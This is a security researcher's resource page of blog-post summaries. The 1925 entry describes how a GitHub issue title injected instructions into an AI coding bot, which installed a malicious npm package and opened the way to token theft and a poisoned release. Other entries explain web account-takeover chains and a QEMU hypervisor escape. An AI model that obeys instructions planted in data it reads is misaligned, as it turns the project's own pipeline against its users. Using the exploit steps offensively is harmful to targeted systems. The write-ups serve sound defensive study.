Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

A GitHub Issue Title Compromised 4,000 Developer Machines- 1925

grith.ai    Reference →Posted 3 Days Ago
  • Cline is CLI npm package that is a simple AI assistant. Recently, it experienced a supply chain compromise via a unique prompt-injection bug.
  • The package used the GitHub Action claude-code-action to trigger actions when users create an issue. This executed some code in the repository's context, but not much else is said. The title and description were given directly to Claude for usage. However, the title was able to hijack Claude's actions using this input.
  • The AI bot was instructed to install a malicious npm package. Claude did what it was told and installed a typo-squatter package glthub-actions/cline. The fork oft he regular package contained a package.json with a preinstall script that executed a remote shell.
  • The attacker then used the bash script Cacheact to poison the cache. In particular, this tool can be used to persist information in the build pipeline. So, the intended build was not run during a daily release Action; it was the poisoned one. Using these privileges, they told the NPM_RELEASE_TOKEN and several other tokens.
  • The NPM token was used to publish the malicious NPM module. The client version installed a script that installed OpenClaw via a postinstall hook. The version was only live for 14 minutes before StepSecurity identified the issue and removed it within 8 hours.
  • The story gets crazier, though: the maintainers attempted to rotate the stolen credentials but deleted the WRONG token. So, the token remained active long enough for a new version to be deployed 6 days later. Apparently, this had been reported to the project by Adnan Khan in December of 2025, but it was never acknowledged. A threat actor found the PoC on his test repository and exploited the bug themselves.
  • StepSecurity catches this so fast is fascinating. First, the published differs from normal patterns. In the usual case, the project used OIDC trusted publishing instead of human publishing. Next, legitimate releases use attestations to verify the package's legitimacy, which also wasn't present. Finally, the postinstall script was malicious and made no sense in this context.
  • StepSecurity included a few steps for enterprise customers to protect themselves. First, use a cooldown period to ensure a newly updated package isn't being used. They also have a GitHub actions runner hardening process to make this more difficult to perform as well.
  • Cline took the exploit seriously and made some changes. First, they disabled caching where credentials are being used. Next, they started using provenance attestations for npm publishing. Finally, they improved their security process with SLAs, verification requirements on credential rotation, and got third-party audits of the infra. Going forward, I expect to see more of these completely automated flows getting compromised like this.

EVM Research- 1924

evmresearch    Reference →Posted 3 Days Ago
  • A curated list of resources on how the EVM functions and security patterns.

Improving Skill-creator: Test, measure and redefine Agent Skills- 1923

Anthropic     Reference →Posted 3 Days Ago
  • Claude classifies skills into two buckets: capability uplift and encoded preference. The former is for getting Claude to perform actions that it cannot do by itself. The second is something that Claude already can do but doing it according to some process. The difference between these changes the way that they are evalulated.
  • The skill-creator helps write tests that check that Claude did what you expected for a given prompt. This is similar to softweare tests. This is important for A) understanding the capabililties, B) catching regressions and C) detecting whether the base model has outgrown the skill. The metrics show the time, the pass/fail rate and amount of tokens used. All really important evals! This now has A/B testing too.
  • Another new aspect of skill creator is tuning the descriptions to have Claude automatically trigger them at the proper times. Overall, a good post on a feature that I had no idea about to improve Claude skills.

Lessons from Building Claude Code: How We Use Skills - 1922

trq212 - Anthropic    Reference →Posted 3 Days Ago
  • Claude Skills are becoming bigger and bigger. This article details how to write good Claude skills from people using them internally at Anthropic. They break it down into nine different categories.... library API references, production verification, data/analysis, business automation, scaffolding/templates, code review, CI/CD deployment, incidient runbooks and infrastructure ops.
  • The first tip is to NOT state the obvious. If something is default then Claude already knows it. Skills that improve on Claude's base knowledge, after trial and error, are great. Another item is a basic gotchas section. These are built in common failure points that Claude runs into when using the skill; these should be updated over time.
  • Claude skills aren't just markdown files anymore; they are a folder of information. You can tell Claude what files are in a skill and when to read specific information. This progressive disclosure limits the usage of context while giving Claude all of the information that it needs. Some skills include built-in memory by having log files, JSON files or even a SQLite database.
  • Giving Claude scripts and libraries to use can make it even more powerful. This is great for complex analysis, custom calls that are require and much more. Hooks are code that is always ran at deterministic times. The more deterministic Claude can be with user created code, the better.
  • They also say to be careful about being too prescriptive. Claude is smart and can adapt to many situations. Their example of being too prescriptive is having step by step instructions to complete simple tasks. A good article on using Claude skills more effectively.

<iframe> Sandbox Bypass, Cross-Origin Drag-Drop, Unvalidated postMessage origin, Cookie Bomb to Account Takeover- 1921

Renwa    Reference →Posted 3 Days Ago
  • The author of this post was reviewing a target that had an interactive playground for developers to write and evaulate Javascript to interact with a developer API. This is a great attack surface to target! Sometimes, the vulnerability is the attack surface.
  • The application attempts to sandbox the users JavaScript execution by creating a separate iframe and running the code in there. However, the iframe didn't contain the sandbox attribute, depsite being in a dive and having a name that contained sandbox in it. This means that the iframe is considered same origin and can access content within the parent page.
  • The iframe creation sets the src via data:text.... Normally, this would mean it has the null origin. Luckily for the author, the page calls document.open() and document.write() on the iframes document before the URI loads! This means that the iframe's origin is from the parent. In practice, this means that any code injected into the textarea is evaulated on the full origin of the target site. This creates DOM XSS but they needed a remote way to exploit it.
  • How do we get a user to add this payload? The author has many posts are weaponizing drag in drop across windows. When a user starts dragging an element on Page A, which then redirects to page B, the drag action persists across windows. To exploit this, an attacker can host a page with an attractive draggable image, set the drag data to be an XSS payload, redirect to the victim page and when the user releases the drag, it drops right into the code editor. This works on Firefox and Safari. On Chrome, it requires a popup instead of a redirect.
  • Even with the drag and drop exploit, the victim still needs to click Evalulate. Luckily for them, there's a postMessage handler that doesn't check the origin. So, any cross-origin window is able to call Evalulate on the editor. With this, they can achieve full XSS via some user interaction. The chain is a drag-n-drop switcheroo with an XSS payload onto the parent page that is triggered by a postMessage.
  • Full XSS wasn't enough; they wanted to get an account takeover. The website used OAuth for logging in. They prevented the OAuth callback from working server-side by using a cookie bomb to trigger a 431 error. Now, the auth code is UNUSED within the URL but the code wasn't used. Using this authorization code leads to a complete account takeover.
  • This is a crazy chain of bugs! It does require a drag-n-drop so the triager on the bug bounty program says that it requires too much interaction. Still, the techniques used are pretty awesome and I loved about client-side security from this post. Great write up!

From virtio-snd 0-Day to Hypervisor Escape: Exploiting QEMU with an Uncontrolled Heap Overflow- 1920

OtterSec    Reference →Posted 3 Days Ago
  • QEMU is a machine emulator and virtualizer that let's a host system run guest operating systems of any architecture. For this post, they decided to review Virtio Devices because they require an interface with the host operating system. virtio-snd device buffers are stored in a FIFO linked list after being popped from the virtqueue.
  • In virtio_snd_handle_rx_xfer() there is a code for computing the proper size to use. This takes the size of a buffer and subtracts the size of a struct from it. However, this calculation can underflow by using a small buffer, giving us the first bug. In virtio_snd_pcm_in_cb() the usage of a buffer vs. the allocation is slightly off. First, the allocation size and the bounds check have an 8 byte difference, allowing for an 8 byte OOB write. The final bug was missing bounds check in the edge case of user provided values, creating another OOB write. This happened because the actual buffer allocation size was taken into account.
  • The exploit focuses on the third bug because it contains the largest overflow. Each of these bugs is in the audio input path coming from the host side. So, the OOB write is effectively random. What can we even do with a write with uncontrolled data? Their initial idea was to overwrite a data structure with a size within QEMU but they couldn't find a suitable target. So, they targetted glibc, the heap allocator itself, to corrupt a tcache bin sized chunk size. This allowed them to free a chunk with an oversized entry into the tcache freelist.
  • To perform a heap spray and get a better allocation primitive, they used the paravirtualized filesystem device virtio-9p. With each P9_TXATTRCREATE a host-side buffer is allocated with a name and value field, where the size is arbitrarily controlled. It can be written back to and read through later. An allocation on demand with a choosen size, fully controllable contents and the ability to free as needed. This is perfect for heap exploitation!
  • To use the corruption, they fill up the bins and flush them continuously. Eventally, a write will occur on a 0x200 sized chunk on the size that will make it LARGER than the intended size. Once this is freed into the 0x210-0x2f0 bin it's overallocated. After reurning this chunk, a write to it will corrupt the size of the FOLLOWING chunk ahead of it with a user controlled value of 0x400. Now, the chunk has a complete overlap with the chunk ahead of it. This is a super useful state to be in.
  • To get a heap leak, they use the tcache free list fd pointer. When it's the only entry in the list, safe linking is effectively useless because it's XORed with 0x00. They lost the final 12 bits. With this primitive, they write a pointer to the fd slot that is controlled and then read the memory. At this point, they can just reverse the XOR and read the slot. This effectively creates an encryption oracle to get the bits out. Pretty neat!
  • Using the object V9fsFidState, they were able to produce an arbitrary read/write from the tcache poisioning primitive. By allocating an overlapped chunk with this object, there is a pointer that is directly controllable. This can be used for both reads and writes, which is effectively game over at this point.
  • This bug sat in the codebase for over 2 years but was fixed the same week that OtterSec found it. Still, this is a great example of turning a small bug into something much larger with cascading improvements to exploitability. Great post!

When PKCE Doesn't Protect You: Bypassing OAuth Code Exchange- 1919

labs.trace37    Reference →Posted 3 Days Ago
  • In a previous blog post, they discussed a vulnerability in an authentication flow that was broken through bad frame communication. One of the issues that made this possible is discussed in depth in this blog post.
  • OAuth Proof Key for Code Exchange (PKCE) is an authorization flow used to prevent code interception and injection attacks. This is done via the calling application, creating a secret that is then verified by the authorization server. The code was generated on the client side as a SHA-256 hash and then sent to the server for later use.
  • The authorization code returned by the SSO is bound to whatever codeChallenge was in the URL when the SSO page loaded. The parent page generates the PKCE and includes the challenge as part of the SSO URL. This is a problem though: the challenge must be generated and unique to the request! If an attacker can set it, then it bypasses the entire purpose of PKCE.
  • A good quote from the author: "PKCE protects the code in transit. It does NOT protect against an attacker who controls the authorization request itself." Understanding what a security does and doesn't protect against is crucial. Great spot to finish off the chain!

Hijacking the Channel: Zero-Click Account Takeover via MessagePort Injection- 1918

labs.trace37    Reference →Posted 3 Days Ago
  • Web pages are intentionally isolated from one another. It would be insecure if another website could read the contents of your page. Or, use cookies to retrieve sensitive information. So, browsers with features like the same-origin policy (SOP) and others prevent these types of attacks. Regardless, it is still important to allow for the same cross-website communication.
  • The most common way is postMessage. A lesser-known mechanism is the MessageChannel API. This creates a private, bidirectional communication pipe between two contexts. Once a MessagePort is transferred, the channel is considered secure. This functionality was used on SSO login embedded within an iframe and used to deliver OAuth authorization codes ot the parent application.
  • With postMessage, it's common to miss an origin check. With MessageChannel, it works differently. You create a channel with two ports, you send one of the ports to another page, and use the other port yourself. There's no need to verify the origin because it's inherently private. So, how does the other page get this port? postMessage of course!
  • To flow for logging in worked as follows:
    1. A first-party application, such as an online store, embeds the SSO login page in an iframe.
    2. SSO iframe broadcasts readiness to its parent via postMessage(). The parent responds with a MessagePort.
    3. User authenticates in the iframe. On success, the SSO provider sends the auth code via the MessagePort.
    4. The parent echagnes the code for a JWT session via server-side calls.
  • This flow was reasonably solid but had a few subtle issues with it. First, there was no framing protection on the SSO login pages. This makes it possible to attack the parent frame. Second, the postMessage with the port was using a * as the sender. Additionally, the origin wasn't being validated on the sender. In practice, this means that the first submitted port wins.
  • The attack works by first hosting a page on any domain that has the SSO login page (parent) in an iframe. When the SSO parent broadcasts that it's ready, the attacker creates a message channel and sends the port to the iframe. This allows the attacker's website to own the communication between the SSO iframe and the standard website. This leads to intercepting the auth code, leading to an account takeover.
  • The vulnerability is awesome! I also enjoyed the discussion of the threat model. However, I thought the framing of the bug was a little extreme and degrading. The constant use of the word failure, wrong, broke... if we want security to get a better rep, it needs to be more constructive imo. Also, if you have to click on a website link, then it's not zero-click.

Needle in the haystack: LLMs for vulnerability research- 1917

Devansh    Reference →Posted 4 Days Ago
  • The author of this post found several vulnerabilities purely using LLMs. In this post, they outline some takeaways from the hundreds of prompts they have used. To start with, they debunk an intuition: more data isn't necessarily better. LLMs have a recency bias and suffer from context rot. Providing too much context, overly-scaffolded chaining of prompts, and bloated SKILLS.md files hurts the process.
  • They start from the beginning: why can't you just say "LLM find me bugs". The first issue is that LLMs don't have a notion of impact. So they will end up with a nonsensical threat model. Without clear trust boundaries, it does a horrible job. Second, general prompts get general answers. The model will pattern-match common bug classes and not go very deep. Threat modeling is the ultimate form of context compression.
  • The process for creating a good threat model drew on prior CVEs: list several previously discovered bugs and how they were triggered. From this threat model, they created plausible bug classes to review the codebase for. On ParseServer, the LLM identified an interesting trust boundary with multiple keys at different privilege levels. After surveying the code, they identified that several handlers gate access on isMaster() without checking isReadOnly(). With a narrower prompt focusing on this, they found 3 bugs and a fourth on in JWT aud claim lacking verification.
  • In the HonoJS library, they reviewed the JWT verification flow. They gave it previous CVE's and general JWT implementation vulnerabilities. From there, they asked the LLM to identify high-risk areas, which it identified as algorithm confusion and default fallback behavior. With some direction, they scanned for the specific flaws, and the LLM surfaced two concerning patterns. Finally, they asked in what exact conditions an LLM could trigger these vulnerabilities. This popped out two classic algorithm confusion bugs.
  • On ElysiaJS the LLM flagged secrets rotation as being sketchy. After further digging, the LLM found that a Boolean initialization error caused signature validation checks to never fail during secrets rotation. On harden-runner, a GitHub Actions tool for preventing data exfiltration, it found several gaps in the syscall filtering that allowed data to be exfiltrated. On a similar product called BullFrog, they identified three distinct bypasses via similar methods.
  • Finally, in Better-Hub, an alernative GitHub frontend, they found six XSS variants, all stemming from unsanitized Markdown. One of the rabbit holes was on caching, which led to two authorization bypasses for private repository content leaks. Instead of deriving the threat model from other data, they described it themselves. The LLM helped find high-risk areas with the prompt "What happens when user-controlled content is rendered unsafely in a context that has access to stored credentials?"
  • None of these code reviews had a giant checklist, huge scaffolding or anything else. They started with a simple threat model that identified sections of codebases that had security-critical operations. From there, they let the LLM focus heavily on that section of code and try to violate various security invariants. The claim here is twofold: use threat models and pick small yet sensitive slices of the codebase to find bugs.
  • They have a few general tips for prompting. First, assert that vulnerabilities exist; this is important because LLMs have been trained to be agreeable. Similar to the first one, asserting search pressure by saying a vulnerability has already been found makes it much more likely to find issues. Again, telling it to assume that developers make mistakes, rather than rationalizing the code, seems useful for finding bugs as well. Second, ask for the exploit, not an assessment; this forces the model to produce a concrete, testable input to trigger the bug.
  • LLMs are very good at comparative analysis. It can leverage its training data against known patterns to find bugs. Another tip is not settling on the first answer, you can ask for more with different criteria. A simple "what else" can be useful. The final tip they give is constraining how the application can be attacked. For instance, stating that it's a remote unauthenticated attacker. This eliminates many false positives and helps the model stay focused.
  • This was a fantastic post that is definitely going against the grain. In this case, the author was in the loop the whole time, instead of having an agent do everything. Less context and more focus seem to be the general theme of this post.

The 2026 Global Intelligence Crisis- 1916

Citadel Securities - Frank Flight    Reference →Posted 4 Days Ago
  • The end of knowledge work has been claimed to be here with AI tooling. Will this mean working fewer hours? Universal basic income? There are many questions about what the world will look like in 5 years. Citadel pulls back the curtain of history to discuss what may happen
  • The first thing they point out is that improvements in AI technology don't mean adoption. From August of 2024 to November of 2025, despite major improvements in tooling, adoption has barely increased. With this adoption, the risk of displacement declines as the pace of adoption slows. The cost of integrating early is expensive compared to those who come later. There's also a major question of cost. If white-collar work is cheaper than the computer that is required, then the workers will be used.
  • AI productivity is a supply chain shock. This lowers marginal costs, expands potential output, and increases income. Every major technological advancement, from steam power to electricity to computers, has followed this pattern. The counterargument is that AI replaces people, thereby dramatically lowering costs. In reality, lower prices increase purchasing power and increase consumption. In a world where productivity surges but demand collapses violates basic accounting.
  • For situations with coordination friction, liability constraints, and trust barriers, AI will be a complement rather than a substitute. Historically, technological revolutions have changed the tasks performed rather than eliminated labor altogether. For negative demand for labor to occur, it would require the total automation of everything. For instance, did Microsoft Office help office workers, or did it make them obsolete?
  • In 1930, John Maynard Keynes thought that productivity growth would be so great that the workweek would fall to 15 hours. In reality, people work MUCH more. Rising productivity lowers costs and expands the consumption frontier! Leisure increased modestly, but material aspiration expanded far more. Humans' wants are too large for there to be a limit.
  • Overall, I appreciated the review of the history of productivity increases and its comparison to AI. These waves have offset other issues and kept the economy advancing by %2. Thanks for the perspective.